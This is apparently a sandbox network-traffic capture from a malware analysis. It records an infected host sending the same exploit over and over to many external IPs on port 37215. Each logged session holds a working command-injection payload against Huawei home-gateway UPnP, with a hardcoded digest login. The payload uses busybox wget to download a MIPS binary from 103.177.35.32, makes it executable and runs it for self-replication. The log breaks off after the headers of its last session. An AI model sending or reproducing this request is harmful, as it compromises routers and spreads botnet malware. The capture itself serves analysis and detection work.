                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1196192.168.2.2356404197.37.170.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.544342995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1197192.168.2.2334608119.168.215.9337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.544604063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1198192.168.2.235526619.109.23.19137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.544620037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1199192.168.2.2354494157.59.187.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.545394897 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1200192.168.2.234263875.119.159.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.545449972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1201192.168.2.2341200157.91.91.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.545852900 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1202192.168.2.235002841.61.70.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.545861959 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1203192.168.2.233658435.42.70.14737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.545901060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1204192.168.2.2347092197.76.104.9437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.545922995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1205192.168.2.233471661.12.164.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.546173096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
